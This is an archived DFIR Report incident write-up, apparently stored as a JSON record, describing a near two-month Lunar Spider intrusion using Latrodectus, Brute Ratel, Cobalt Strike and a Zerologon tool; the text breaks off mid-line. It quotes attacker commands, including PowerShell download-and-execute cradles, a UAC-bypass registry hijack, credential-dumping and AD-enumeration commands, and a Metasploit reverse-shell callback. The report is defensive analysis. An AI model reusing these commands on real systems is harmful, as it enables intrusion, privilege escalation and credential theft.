{
	"id": "216cfbfd-7e5c-4660-af68-d9e413165ba7",
	"created_at": "2026-04-06T01:32:28.551499Z",
	"updated_at": "2026-04-10T13:12:03.008749Z",
	"deleted_at": null,
	"sha1_hash": "f0163a40d10de6ebe7169543e45e67af2d6a621f",
	"title": "From a Single Click: How Lunar Spider Enabled a Near Two-Month Intrusion",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 8143122,
	"plain_text": "From a Single Click: How Lunar Spider Enabled a Near Two-Month\r\nIntrusion\r\nBy editor\r\nPublished: 2025-09-29 · Archived: 2026-04-06 00:44:55 UTC\r\nThis case was featured in our September 2025 DFIR Labs Forensics Challenge and is available as a lab today here for one-time\r\naccess or included in our new subscription plan. It was originally published as a Threat Brief to customers in Feb 2025.\r\nCase Summary\r\nThe intrusion took place in May 2024, when a user executed a malicious JavaScript file. This JavaScript file has been\r\npreviously reported as associated with the Lunar Spider initial access group by EclecticIQ. The heavily obfuscated\r\nfile, masquerading as a legitimate tax form, contained only a small amount of executable code dispersed among\r\nextensive filler content used for evasion. The JavaScript payload triggered the download of an MSI package, which\r\ndeployed a Brute Ratel DLL file using rundll32.\r\nThe Brute Ratel loader subsequently injected Latrodectus malware into the explorer.exe process and established\r\ncommand and control communications with multiple Cloudflare-proxied domains. The Latrodectus payload was\r\nthen observed retrieving a stealer module. Around one hour after initial access, the threat actor began reconnaissance\r\nactivities using built-in Windows commands for host and domain enumeration, including ipconfig, systeminfo, nltest,\r\nand whoami commands.\r\nApproximately six hours after initial access, the threat actor established a BackConnect session and initiated VNC-based remote access capabilities. This allowed them to browse the file system and upload additional malware to the\r\nbeachhead host.\r\nOn day three, the threat actor discovered and accessed an unattend.xml Windows Answer file containing plaintext\r\ndomain administrator credentials left over from an automated deployment process. 
This provided the threat actor with\r\nimmediate high-privilege access to the domain environment.\r\nOn day four, the threat actor expanded their activity by deploying Cobalt Strike beacons. They escalated privileges\r\nusing Windows’ Secondary Logon service and the runas command to authenticate as the domain admin account\r\nfound the prior day. The threat actor then conducted extensive Active Directory reconnaissance using AdFind.\r\nAround an hour after this discovery activity they began lateral movement. They used PsExec to remotely deploy\r\nCobalt Strike DLL beacons to several remote hosts including a domain controller as well as file and backup servers.\r\nThey then paused for around five hours. On their return, they deployed a custom .NET backdoor that created a\r\nscheduled task for persistence and set up an additional command and control channel. They also dropped another\r\nCobalt Strike beacon that had a new command and control server. They then used a custom tool that used the\r\nZerologon (CVE-2020-1472) vulnerability to attempt additional lateral movement to a second domain controller.\r\nThey then tried to execute Metasploit laterally to that domain controller via a remote service. However, they\r\nwere unable to establish a command and control channel from this action.\r\nOn day five, the threat actor returned using RDP to access a new server that they then dropped the newest Cobalt\r\nStrike beacon on. This was then followed by an RDP logon to a file share server where they also deployed Cobalt\r\nStrike.\r\nhttps://thedfirreport.com/2025/09/29/from-a-single-click-how-lunar-spider-enabled-a-near-two-month-intrusion/\r\nPage 1 of 48\n\nAround 12 hours after that they returned to the beachhead host and replaced the BruteRatel file used for\r\npersistence with a new BruteRatel badger DLL. After this there was a large gap before their next actions.\r\nFifteen days later, the 20th since initial access, the threat actor became active again. 
They deployed a set of scripts to\r\nexecute a renamed rclone binary to exfiltrate the data from the file share server. This exfiltration used FTP to send\r\ndata over a roughly 10-hour period to the threat actor’s remote host. After this concluded there was another pause in\r\nthreat actor actions.\r\nOn the 26th day of the intrusion the threat actor returned to the backup server and used a PowerShell script to dump\r\ncredentials from the backup server software. Two days later they appeared again on the backup server and dropped a\r\nnetwork scanning tool, rustscan, which they used to scan subnets across the environment. After this, hands-on activity\r\nceased again.\r\nThe threat actor maintained intermittent command and control access for nearly two months following initial\r\ncompromise, leveraging BackConnect VNC capabilities and multiple payloads, including Latrodectus, Brute Ratel,\r\nand Cobalt Strike, before being evicted from the environment. Despite the extended dwell time and comprehensive\r\naccess to critical infrastructure, no ransomware deployment was observed during this intrusion.\r\nIf you would like to get an email when we publish a new report, please subscribe here.\r\nAnalysts\r\nAnalysis and reporting completed by @RussianPanda9xx, Christos Fotopoulos, Salem Salem, reviewed by\r\n@svch0st.\r\nInitial Access\r\nThe infection began with the execution of a Latrodectus JavaScript file,\r\nForm_W-9_Ver-i40_53b043910-86g91352u7972-6495q3.js, first reported on X by @Cryptolaemus1 in the following post:\r\nThe malware was first uploaded to VirusTotal on May 9, 2024, prior to Operation Endgame. 
This operation occurred\r\nbetween May 27 and 29, 2024, during which law enforcement dismantled multiple botnets, including Latrodectus.\r\nAfter the takedown of the botnet, Latrodectus reappeared in June 2024, using tax-themed phishing campaigns as its\r\ninitial access mechanism that dropped Latrodectus version 1.3 along with Brute Ratel, according to this article by\r\nTrustwave.\r\nAlthough our sample was from May and its file name was related to a W-9 tax form, it was version 1.3 of the\r\nmalware and additionally it utilized Brute Ratel. Based on that, we believe it to be an early version of the campaign\r\nthat was used later in June.\r\nThis report from Rapid7, also from June 2024, shows a malicious ad as the initial access used to lure a victim to\r\ndownload the malicious JavaScript file. Given the similarity of that report and our initial malware behavior, we assess\r\nthat this was likely the same method used for our case as well.\r\nThe heavily obfuscated JS file contained multiple lines starting with //, which included filler text. 
After further\r\nanalyzing the file, a deobfuscation workflow was identified, executing all the lines of code starting with ////.\r\nStage 1\r\nStage 2\r\nDeobfuscating the Latrodectus malware uncovered that it performed an HTTP request to the URL\r\nhxxp://91.194.11[.]64/MSI.msi to install the next stage, thus triggering the Suricata rule from Emerging Threats ET\r\nPOLICY Observed MSI Download.\r\nExecution\r\nStatic analysis of the MSI package revealed that upfilles.dll was embedded within the compressed disk1.cab archive.\r\nThe MSI installer utilized a custom action to execute the DLL via the legitimate Windows binary rundll32.exe,\r\nspecifically invoking the exported function stow to initiate malicious execution.\r\nBrute Ratel\r\nOn day one, the loader upfilles.dll began execution on the beachhead host by resolving three APIs (VirtualAlloc,\r\nLoadLibraryA, GetProcAddress) via the following hashing algorithm:\r\ndef api_hash(api_name):\r\n    # Running hash; a starting value of 0 is assumed, as the excerpt does not show it\r\n    hash_value = 0\r\n    for char in api_name:\r\n        char_byte = ord(char)\r\n\r\n        # Converts to lowercase, adds current hash\r\n        temp = (char_byte | 0x60) + hash_value\r\n\r\n        # Double for position-dependent hash\r\n        hash_value = 2 * temp\r\n\r\n    return hash_value\r\nHashing algorithm\r\nThen it decrypted the intermediary Brute Ratel payload via an XOR decryption algorithm using the embedded key:\r\n21 79 3C 7A 39 5F 3E 24 54 4A 7A 35 6C 33 3E 32 5F 66 74 76 6D 59 3C 4D 00\r\nThe encrypted intermediary BRC4 payload\r\nThe shellcode above then decrypted the BRC4 
badger via the RC4 key 71 24 70 2C 7D 70 61 3F. Below are the\r\ndecrypted Brute Ratel C4 (BRC4) C2s and the RC4 key used to decrypt the gathered information on the infected system that\r\nis sent to the C2.\r\nDecrypted BRC4 C2s and the RC4 key\r\nThe following YARA rule triggered during a scan of the process memory for Brute Ratel:\r\nOn day five, the threat actor deployed a new Brute Ratel DLL through the established BackConnect session:\r\nrundll32 wscadminui.dll, wsca\r\nThe wscadminui.dll file serves as the Brute Ratel badger payload, maintaining the same obfuscation patterns\r\nestablished by the upfilles.dll loader. Decryption of the intermediary BRC4 payload is achieved through XOR\r\noperations using the embedded key sequence 75 36 58 33 64 4F 61 3F 4B 59 23 42 77 42 6F 41 39 6D 6E 4E 5E 46\r\n56 47 66 41 00.\r\nLatrodectus\r\nAfter executing, Brute Ratel deployed Latrodectus malware through process injection into explorer.exe leveraging the\r\nCreateRemoteThread API. Latrodectus, a downloader first identified by Proofpoint researchers in November 2023, is\r\nattributed to the same threat actors responsible for developing IcedID.\r\nLatrodectus being injected into explorer.exe\r\nApproximately six hours later, the process running Latrodectus established a connection to 193.168.143[.]196 on the\r\nbeachhead host, which we suspect to have been a BackConnect C2 server. BackConnect is a post-compromise\r\nmodule that was initially deployed by IcedID, allowing threat actors to leverage infected systems for remote access\r\nthrough VNC modules. 
Multiple security researchers, such as Elastic Security Labs, hypothesize that Latrodectus is a\r\npotential successor to IcedID, due to code reuse and behavioral similarities, including the use of the same commands\r\nin the Discover flag.\r\nAn hour after this traffic started, the following command was executed to switch to UTF-8 encoding:\r\ncmd.exe /K chcp 65001 \u0026\u0026 c: \u0026\u0026 cd c:\\\r\nThis command was previously observed in Keyhole, a multi-functional VNC/BackConnect component used by\r\nIcedID, and in prior cases involving IcedID infections.\r\nA few minutes later, Latrodectus spawned DLLHost.exe, likely to inject the BackConnect payload, with\r\nPROCESS_ALL_ACCESS (0x1fffff) access rights. The granted access rights provide full control over the target\r\nprocess, enabling memory manipulation, thread creation, and DLL injection capabilities.\r\nlsassa.exe Backdoor\r\nOn day four, the threat actor deployed and executed a binary named lsassa.exe via BackConnect on the beachhead\r\nhost.\r\nThreat actor dropping lsassa.exe via BackConnect session\r\nThe lsassa.exe file was a .NET backdoor that contained an encrypted payload embedded in an assembly resource file\r\nnamed lsassa\u0026\u0026. Inside this resource, a small header was present declaring which protections were used (encryption\r\nand/or compression). If encryption is used, it either uses a key embedded in the file or derives one from the\r\nassembly’s public key token, then decrypts the payload. If compression is enabled, the code decompresses the\r\ndecrypted data before loading it.\r\nThe backdoor implemented a persistent command and control system that establishes covert communication between\r\nan infected machine and a remote threat-actor-controlled server while creating a scheduled task for persistence. 
Upon\r\ninitialization, the backdoor establishes a timer-based polling mechanism that triggers every 250 seconds to maintain\r\nregular contact with the C2 infrastructure and uses extracted obfuscated strings to construct the command. In our\r\ncase, the threat actor leveraged the backdoor to create a scheduled task on the beachhead host with the command:\r\n\"cmd.exe\" /c schtasks /create /tn \"SchedulerLsass\" /tr \"%ALLUSERSPROFILE%\\USOShared\\lsassa.exe\" /sc ons\r\nDuring each communication cycle, the backdoor collects basic system reconnaissance data, including the username\r\nand machine name of the infected host, then transmits it to a remote server endpoint. The server C2\r\n(hxxps://cloudmeri.com/comm[.]php) was obfuscated and embedded within the resource file name lsassa$ from the\r\ndecrypted resource file lsassa\u0026\u0026. After successfully transmitting the victim data, the backdoor waits for a server\r\nresponse containing executable commands.\r\nWhen commands are received from the remote server, the backdoor validates that the response content is not empty\r\nand executes the payload through the Windows command interpreter. The execution occurs by spawning a new\r\ncmd.exe process with the UseShellExecute flag disabled and CreateNoWindow enabled to maintain stealth, while\r\nredirecting standard output and error streams to capture results. The backdoor includes a special termination\r\ncommand that allows the remote operator to exit the backdoor by calling Environment.Exit when a specific response\r\nstring is received.\r\nSnippet of code showing the backdoor’s command and control communication function that collects system\r\ninformation and transmits it to a remote server while awaiting executable commands\r\nThe backdoor conceals its strings in an encrypted resource and only reveals them at runtime. 
The extraction function\r\nfirst reads a length value to determine how many bytes to pull, then converts those bytes into readable text using\r\nUnicode encoding.\r\nString extraction function that uses variable-length encoding to decode obfuscated strings from the decrypted\r\nresource data array\r\nCobalt Strike\r\nSeveral Cobalt Strike beacons were utilized over the course of the intrusion. The first was observed on day four,\r\nwhere the cron801.dl_ file was dropped on the beachhead host under C:\\ProgramData from the injected explorer.exe\r\nprocess containing Latrodectus and was then executed twice by leveraging BackConnect.\r\nrundll32 cron801.dl_,lvQkzdrFdILT\r\nBackConnect launching Cobalt Strike payload (pcap)\r\nThe outbound connection was established with the Cobalt Strike server at hxxp://45.129.199[.]214/vodeo/wg01ck01.\r\nShortly after, the Cobalt Strike beacon spawned from rundll32.exe was injected into the sihost.exe process.\r\nAnalysis of network traffic revealed a JSON response containing minified Vuetify v3.0.3 JavaScript served by the\r\nCobalt Strike C2 server. 
This discovery led to the identification of additional potentially related C2 servers using\r\nVirusTotal searches for similar characteristics (JSON response content or the URL path /vodeo/):\r\nhxxp[://]94[.]232[.]40[.]49/vodeo/wg01ck01\r\nhxxps[://]techbulldigital[.]com/Apply/readme/VJICARU60DC?_WHBEXNIA=HNMIIIANEMPMLIDFEOPKLBDOEMPI\r\nhxxp[://]techbulldigital[.]com/List/com2/9O29EO3IRSBB\r\nhxxp[://]filomeruginfor[.]com/christian/house/cwk01\r\nhxxp[://]filomeruginfor[.]com/deolefor/wg01ck01m\r\nhxxps[://]wehelpgood[.]xyz/Complete/v9[.]56/KT84GVGD135E\r\nhxxps[://]wehelpgood[.]xyz/derive/n/nzoqjd9mme\r\nhxxp[://]94[.]232[.]249[.]186/vodeo/vid_wg01ck01\r\nhxxp[://]94[.]232[.]249[.]186/vodeo/wg01ck01\r\nJSON response from Cobalt Strike C2\r\nLater the cron801.dl_ file was renamed system.dl_ and deployed to several hosts; this is covered further in the Lateral\r\nMovement section.\r\nLater on the same day, after the execution of the lsassa.exe backdoor, the threat actor dropped sys.dll via the\r\nBackConnect session on the beachhead host. This was another Cobalt Strike stager containing shellcode that exhibits\r\nsimilarities to the payload documented in this report.\r\nThe threat actor executed it via BackConnect with the command:\r\nrundll32 %ALLUSERSPROFILE%\\sys.dll,StartUp471\r\nThe Cobalt Strike implant initiated outbound communication to 206.206.123[.]209:443 (avtechupdate[.]com) before\r\ninjecting itself into the sihost.exe process. 
After the attempted UAC bypass, the Cobalt Strike stager was executed in\r\nmemory with the C2 pointing to resources.avtechupdate[.]com/samlss/vm.ico.\r\nSnippet of Cobalt Strike stager\r\nSpeakeasy output from the extracted Cobalt Strike stager shellcode\r\nShortly after, the sihost.exe process (containing an injected Cobalt Strike beacon) used RUNAS execution to create a\r\nnew process (“gpupdate.exe”) running as the “Domain Admin” account, as described in the Privilege Escalation\r\nsection.\r\nsihost.exe spawning gpupdate.exe as “Domain Admin” user account\r\nThe gpupdate.exe process then injected a Cobalt Strike beacon into the spoolsv.exe process space.\r\nBoth spoolsv.exe and gpupdate.exe processes were observed creating named pipes consistent with Cobalt Strike\r\ncommunication patterns.\r\nCobalt Strike named pipes\r\nThe following day, the sys.dll Cobalt Strike beacon was executed on two additional servers after connections to those\r\nhosts were made via RDP.\r\nPersistence\r\nRegistry Run Key\r\nPersistence was first established after initial access on day one via a Registry Run key. This was achieved via the\r\nrundll32.exe process that created a Run key, with an innocuous name of Update, which would execute the Brute\r\nRatel badger, upfilles.dll, if the system was restarted.\r\nThe Run key was updated multiple times during the intrusion to point to wscadminui.dll in place of upfilles.dll. 
We\r\ncould not determine why the actor re-applied the same change on several occasions.\r\nScheduled Tasks\r\nIn addition to the Run key, the threat actor created a scheduled task on the fourth day of the intrusion on the\r\nbeachhead host. The scheduled task was created by lsassa.exe, which has been explained in further detail in the\r\nExecution section.\r\nPrivilege Escalation\r\nRunas\r\nThe threat actor activated Windows’ Secondary Logon service to enable the runas command – a built-in Windows\r\nfeature that allows running programs under different user credentials. By calling this service, they were able to\r\nauthenticate as the domain admin account found in the unattend.xml file and escalate their privileges from a regular\r\nuser to full administrative control over the network.\r\nStarting the Secondary Logon service\r\nThe Windows authentication log shows successful privilege escalation from a low-privileged user to a domain\r\nadministrator account with elevated token permissions.\r\nWindows security log showing privilege escalation from a low-privileged user to a domain admin\r\nUAC Bypass\r\nThe Cobalt Strike sys.dll implant executed on the beachhead host initiated a UAC bypass using the elevate uac-token-duplication technique, a well-documented registry hijacking method first observed in 2017. 
This technique\r\nexploits the UAC token duplication vulnerability, allowing the Cobalt Strike implant to execute arbitrary code with\r\nprivileges stolen from elevated processes, successfully achieving privilege escalation without user interaction.\r\nInitial registry modifications hijacked the ms-settings protocol handler to redirect Windows Settings calls to\r\nmalicious PowerShell commands:\r\nreg add \"HKCU\\Software\\Classes\\ms-settings\\shell\\open\\command\" /f /d \"cmd.exe /c powershell -nop -w hid\r\nreg add \"HKCU\\Software\\Classes\\ms-settings\\shell\\open\\command\" /v DelegateExecute /f /d \"cmd.exe /c pow\r\nPrivilege escalation occurred through execution of ComputerDefaults.exe, a trusted Windows binary that queries the\r\nhijacked ms-settings protocol with elevated privileges.\r\nWith the elevated token duplicated from ComputerDefaults.exe, multiple PowerShell instances were executed to\r\nestablish communication with the Cobalt Strike listener, indicating token rights restrictions requiring different\r\nexecution approaches:\r\n\"cmd.exe\" /c powershell -nop -w hidden -c \"IEX (New-Object Net.Webclient).DownloadString('hxxp://127.0.\r\npowershell -nop -w hidden -c \"IEX (New-Object Net.Webclient).DownloadString('hxxp://127.0.0[.]1:11664/'\r\n\"C:\\Windows\\syswow64\\windowspowershell\\v1.0\\powershell.exe\" -Version 5.1 -s -NoLogo -NoProfile\r\nDefense Evasion\r\nProcess Injection\r\nThe most common evasion technique that the threat actor utilized was process injection. During its execution, the\r\nBrute Ratel loader upfilles.dll launched the final stage of the Latrodectus malware inside the memory of explorer.exe.\r\nFrom the fourth day onward, the threat actor expanded their tooling and heavily utilized both Brute Ratel and Cobalt\r\nStrike for process injection. 
Using Sysmon Event ID 8, CreateRemoteThread, multiple instances of process\r\ninjection were identified for both long-term and short-term sacrificial processes.\r\nAfter further investigating the process memory, YARA rules also confirmed the injection of Cobalt Strike beacons\r\ninto multiple legitimate processes, such as spoolsv.exe.\r\nFile Deletion\r\nThe threat actor also deleted files after using them, to cover their tracks and make the investigation more challenging.\r\nSpecifically, they deleted more than half of the files and tools that had been downloaded on the compromised hosts.\r\nCredential Access\r\nLatrodectus Stealer Module\r\nUsing command ID 21, the Latrodectus-injected explorer.exe process downloaded the stealer module file\r\nfxrm_vn_9.557302425.bin from the C2 server.\r\nAnalysis revealed that the stealer lacks functionality to decrypt cookies from current Chrome versions, suggesting the\r\nthreat actor may not have updated their stealer module to accommodate recent browser security enhancements. 
The\r\nstealer had the hardcoded time of when the stealer module was built – 00:39:18 Mar 29 2024.\r\nSimilar to the Latrodectus loader component, the stealer module dynamically resolved Windows APIs by iterating\r\nthrough the Process Environment Block (PEB) InLoadOrderModuleList, computing CRC32 hashes for each loaded\r\nmodule name, and comparing results against target hash values.\r\nThe stealer was capable of harvesting credentials from 29+ Chromium-based browsers, including Google Chrome,\r\nMicrosoft Edge, Yandex Browser, Vivaldi, Comodo Dragon, Orbitum, Epic Privacy Browser, and other variants.\r\nFirefox receives separate handling through profile enumeration targeting cookies.sqlite database files.\r\nDuring its execution, it extracted email credentials from Microsoft Outlook configurations across Office versions\r\n11.0-17.0 by querying Windows registry keys. The stealer is also capable of harvesting server configurations\r\nincluding SMTP, POP3, IMAP, and NNTP server addresses, port numbers, usernames, and encrypted passwords.\r\nAdditionally, it targeted the registry path HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows\r\nMessaging Subsystem\\Profiles to extract legacy email configurations from older Windows Mail, Outlook Express,\r\nand MAPI profiles that may contain additional cached credentials. Internet Explorer credentials were obtained\r\nthrough COM interface manipulation, accessing the IntelliForms Storage2 system.\r\nThe collected data is organized into distinct sections with the below headers:\r\ncr_pass for Chrome passwords\r\nff_pass for Firefox data\r\nie_pass for Internet Explorer credentials\r\nedge_pass for Edge data\r\noutlook_pass for email configurations\r\n_cookie variants for session data.\r\nEach section contains structured entries with pipe-delimited fields. 
The complete dataset undergoes base64 encoding.\r\nThe stealer then creates a shared memory region named 12345 and stores a pointer to the encoded data, which could\r\nallow other processes to access the collected information.\r\nSnippet of data collection code showing Firefox, IE, Edge, and Outlook extraction functions.\r\nAnswer File Access\r\nBackConnect was used by the threat actor early in the campaign (day three) to list directories on the beachhead. After\r\nlisting files in directories, the threat actor focused their attention on the file unattend.xml, an answer file. Answer files\r\nare used to control the configuration of Windows while setting it up from an image.\r\nOne of the components of answer files is called Microsoft-Windows-UnattendedJoin, which allows admins to easily\r\ndomain-join devices during setup; this is done by supplying plaintext credentials (username and password) in the\r\nunattend.xml file. The threat actor collected the file via BackConnect (using the GET C:\\Unattend.xml command) and\r\nwas able to access the plaintext domain admin credentials stored in the file.\r\nLSASS Access\r\nThe threat actor utilized their elevated user permissions to access the LSASS process on multiple devices in the\r\nenvironment.\r\nAll instances of LSASS access followed the same pattern: the access was initiated by an injected process (either\r\nrunonce.exe or gpupdate.exe), with one process requesting 0x1010 permissions and, seconds later, another instance of\r\nthe same process requesting 0x1fffff. 
This cycle repeated three times in total during the intrusion, each time facilitated via\r\na Cobalt Strike beacon process.\r\nVeeam-Get-Creds\r\nOn day 26 of the intrusion, the threat actor ran the Veeam-Get-Creds.ps1 script from the injected spoolsv.exe process:\r\npowershell -nop -exec bypass -EncodedCommand SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQ\r\nwhich decoded to:\r\nIEX (New-Object Net.Webclient).DownloadString('hxxp://127.0.0[.]1:24003/'); Veeam-Get-Creds.ps1\r\nThis technique has previously been observed in use by ransomware groups such as Noberus and Vice Society. It typically\r\nindicates the threat actor is targeting backup systems for destruction or virtualization infrastructure for encryption\r\n(commonly protected by Veeam backup solutions). The Veeam-Get-Creds.ps1 script is publicly available on GitHub.\r\nUpon executing the script, the threat actor would have obtained any plaintext usernames and passwords stored in the\r\nVeeam Credential Manager. These credentials are typically used to authenticate to remote systems for backup\r\noperations. In this intrusion, however, this execution was one of the final actions taken by the threat actor.\r\nDiscovery\r\nApproximately one hour after Latrodectus was injected into explorer.exe, it began executing the following discovery\r\ncommands on the beachhead host:\r\nipconfig /all\r\nsysteminfo\r\nnltest /domain_trusts\r\nnltest /domain_trusts /all_trusts\r\nnet view /all /domain\r\nnet view /all\r\nnet group \"Domain Admins\" /domain\r\nnet config workstation\r\nwmic.exe /node:localhost /namespace:\\\\root\\SecurityCenter2 path AntiVirusProduct Get DisplayName | find\r\nwhoami /groups\r\nProcess activity related to discovery then went quiet until day four, when the injected Cobalt Strike beacon used\r\nsysteminfo to query for system information. 
The threat actor then executed DISK command via BackConnect to\r\nhttps://thedfirreport.com/2025/09/29/from-a-single-click-how-lunar-spider-enabled-a-near-two-month-intrusion/\r\nPage 23 of 48\n\nquery disk information.\r\nDISK command execution via BackConnect session\r\nThe Cobalt Strike injected processes then executed reconnaissance commands and leveraged AdFind for Active\r\nDirectory enumeration activities:\r\nsysteminfo\r\nnltest /dclist:domain.local\r\nnet view REDACTED\r\nnet user REDACTED /domain\r\ndir \\\\REDACTED\\C$\r\nnet group \"domain admins\" /domain\r\ndsquery subnet\r\nnltest /domain_trusts\r\nnltest /dsgetdc:domain.local\r\nwmic /node:REDACTED logicaldisk list brief\r\nAdFind Active Directory Enumeration:\r\nadfind.exe -f \"(objectcategory=person)\" \u003e\u003e ad_users.txt\r\nadfind.exe -f \"objectcategory=computer\" \u003e\u003e ad_computers.txt%W\r\nadfind.exe -f \"(objectcategory=organizationalUnit)\" \u003e ad_ous.txt\r\nadfind.exe -subnets -f (objectCategory=subnet)\u003e ad_subnets.txt\r\nadfind.exe -gcb -sc trustdmp \u003e ad_trustdmp.txt\r\nadfind.exe -f \"\u0026(objectCategory=computer)(operatingSystem=*server*)\" -csv \u003e ad_servers.csv\r\nContinued Discovery and Network Testing:\r\nnet view REDACTED\r\nping -n 1 REDACTED\r\ntype \"\\\\REDACTED\\C$\\REDACTED\\REDACTED.bat\"\r\nThe threat actor then tried to move AdFind outputs, but appeared to struggle based on the commands observed:\r\nC:\\PerfLogs\\*.* %ALLUSERSPROFILE%\\\r\nmove %ALLUSERSPROFILE%\\ad_users.txt C:\\REDACTED\\\r\nmove C:\\REDACTED\\ad_users.txt %PUBLIC%\\\r\nWhile this was happening, they continued to issue more discovery commands and attempted to organize their AdFind\r\noutput:\r\nhttps://thedfirreport.com/2025/09/29/from-a-single-click-how-lunar-spider-enabled-a-near-two-month-intrusion/\r\nPage 24 of 48\n\nnet view REDACTED\r\nwmic /node:REDACTED logicaldisk list brief %WINDIR%\\system32\\cmd.exe /C ping -n 1 REDACTED\r\nmove %USERPROFILE%\\ad_users.txt 
%USERPROFILE%\\Pictures\\\r\nattrib %USERPROFILE%\\Pictures\\ad_users.txt\r\nThe actor then expanded their reconnaissance to include DNS information while simultaneously troubleshooting file\r\naccess issues on their collected data:\r\ndnscmd /zoneprint domain.local\r\nnetdom query SERVER \u003e\u003e serv.log\r\nattrib -a -s -h -r /s %USERPROFILE%\\Pictures\\ad_users.txt\r\nattrib %USERPROFILE%\\Pictures\\ad_users.txt\r\nattrib %USERPROFILE%\\Pictures\\*.*\r\nattrib -a +s +h -r /s %USERPROFILE%\\Pictures\\ad_users.txt\r\nBased on the BackConnect traffic capture, we observed that the threat actors did not have the proper access to the\r\nfiles.\r\nMinutes later, the compromised explorer.exe process spawned DllHost.exe, indicating resumption of the\r\nBackConnect VNC activity observed previously. The DllHost.exe process subsequently executed a Windows shell\r\ncommand to open the “This PC” interface on the beachhead host:\r\ncmd.exe /c start \"\" C:\\Windows\\explorer.exe shell:mycomputerfolder\r\nThe session was then leveraged to attempt to view the AdFind results:\r\n\"C:\\Windows\\system32\\NOTEPAD.EXE\" \"C:\\Users\\\u003cusername\u003e\\Pictures\\ad_users.txt\"\r\nThe threat actor continued to encounter file permission issues, preventing them from accessing their own data. 
They\r\nattempted to resolve this by first setting the local user as the file owner, then switching to the domain account as\r\nowner, and when both ownership changes failed to provide adequate access, they finally used the /reset command to\r\nrestore default permissions:\r\nicacls C:\\Users\\\u003cusername\u003e\\Pictures\\ad_users.txt /setowner \"\u003clocal user\u003e\" /T /C\r\nicacls C:\\Users\\\u003cusername\u003e\\Pictures\\ad_users.txt /setowner \"\u003cdomain\u003e\\\u003clocal user\u003e\" /T /C\r\nicacls \"C:\\Users\\\u003cusername\u003e\\Pictures\\ad_users.txt\" /reset /T\r\nAfter running the Cobalt Strike beacons laterally on several hosts, the threat actor conducted remote user\r\nenumeration across domain systems using the following command from the beachhead host:\r\nquser \u003cREDACTED HOSTNAME\u003e\r\nThe threat actor utilized the PowerView module Invoke-ShareFinder twice during the intrusion.\r\nIEX (New-Object Net.Webclient).DownloadString('hxxp://127.0.0[.]1:49157/'); Invoke-ShareFinder -CheckSh\r\nApproximately 45 minutes following the Metasploit shell deployment attempt on the second domain controller, the\r\nthreat actor initiated an additional round of AdFind reconnaissance from the beachhead host:\r\nAdFind.exe -b dc=domain,dc=local -f (objectcategory=person) \u003e adflogs\\domain.local_ad_users.txt\r\nAdFind.exe -b dc=domain,dc=local -f (objectcategory=computer) \u003e adflogs\\domain.local_ad_computers.txt\r\nAdFind.exe -b dc=domain,dc=local -f (objectcategory=organizationalUnit) \u003e\r\nadflogs\\domain.local_ad_ous.txt\r\nAdFind.exe dc=domain,dc=local -subnets -f (objectcategory=subnet) \u003e adflogs\\domain.local_ad_subnets.txt\r\nAdFind.exe -b dc=domain,dc=local -f (objectcategory=group) \u003e adflogs\\domain.local_ad_group.txt\r\nAlthough the threat actor attempted to compress the collected data, forensic analysis did not identify any created zip\r\narchives on the system.\r\n\"7z.exe\" a -mx1 -r0 adflogs.zip 
adflogs\r\nThe threat actor returned 28 days after the initial access to run a final round of network scanning discovery. Operating\r\nfrom a backup server, the threat actor deployed the rustscan tool through the Cobalt Strike-injected spoolsv.exe\r\nprocess, first running rustscan with the help flag. The threat actor then began scanning various /16 and /8 network\r\nblocks for SMB services.\r\nrustscan.exe -a REDACTED/16 -p 445 --no-nmap\r\nrustscan.exe -a REDACTED/16 -p 445\r\nrustscan.exe -a REDACTED/8 -p 445\r\n\"nmap -vvv -p 445 REDACTED\"\r\nLateral Movement\r\nWMI Remoting\r\nAlthough the threat actor ran discovery commands just under an hour after the initial access, the first lateral\r\nmovement attempt came three days into the intrusion, when the threat actor attempted to execute the system.dl_\r\nCobalt Strike beacon on a domain controller via WMIC remote execution. This execution was not successful, as it\r\nwas not observed on the domain controller.\r\nRemote Services\r\nAfter the failed lateral movement attempt via WMIC, the threat actor pivoted to PsExec. The initial PsExec command\r\nalso failed since the threat actor forgot to include the accepteula flag.\r\nAfter fixing the forgotten EULA mistake, they were able to successfully execute system.dl_ on the domain controller\r\nvia rundll32.\r\nThe threat actor then proceeded to execute the same command on a file share server and backup server minutes after\r\nthe domain controller execution.\r\nSix hours after this initial lateral movement activity, the threat actor deployed and executed the zero.exe payload\r\nfrom C:\\ProgramData on the beachhead. 
This payload, delivered via BackConnect session, was a custom\r\nimplementation of the Zerologon vulnerability (CVE-2020-1472) exploit with capabilities for credential harvesting\r\nand remote code execution.\r\nzero.exe delivered via BackConnect\r\nDuring the intrusion the threat actor used zero.exe to move laterally between devices in the network. The executable\r\nwas executed on the beachhead host and targeted a second domain controller; overall, it was executed eight different\r\ntimes, with a different username being used on every execution. The execution used remote services to run code on\r\nlateral hosts.\r\nAfter the completion of the zero.exe executions, the threat actor attempted to establish a Metasploit reverse shell\r\nconnection via a remote service on the same domain controller, to the C2 server at 217.196.98[.]61:4444.\r\nRemote Service executing Metasploit shellcode\r\nRunning Metasploit shellcode in speakeasy\r\nRDP\r\nRDP was another Windows native tool used by the threat actor for lateral movement. 
The threat actor had extracted\r\ndomain admin credentials as discussed in the Credential Access section; these credentials were used by the threat\r\nactor to log in to two servers in the environment from the beachhead device via RDP, giving them interactive admin\r\naccess to both devices.\r\nWhile the logins originated from the beachhead host, the threat actor leaked their source hostname during the\r\nauthentication process.\r\nVPS2DAY-32220LE\r\nThe threat actor’s hostname implies that the infrastructure used by them was provided via the German hosting company\r\nVPS2DAY, which seems to be operating under the name Servinga since the vps2day domain redirects to Servinga.\r\nCommand and Control\r\nLatrodectus/Backconnect\r\nThe malware used to gain the initial foothold in the host was a Latrodectus JavaScript file. The aforementioned file\r\nhas been associated with high confidence to the Russian threat actor LUNAR SPIDER by EclecticIQ.\r\nIt is important to note that although the sample contained only two domains, the injected explorer.exe communicated\r\nwith three additional C2 servers. After further investigating the explorer’s memory, the following HTTPS request was\r\nidentified towards one of the new domains:\r\nUpon decrypting the encrypted traffic sent by Latrodectus to the C2, the following information was identified:\r\nC2 Domain: hxxps[://]grasmertal[.]com/live/\r\nCampaign ID: 2221766521\r\nLatrodectus Version: 1.3\r\nRC4 Key: 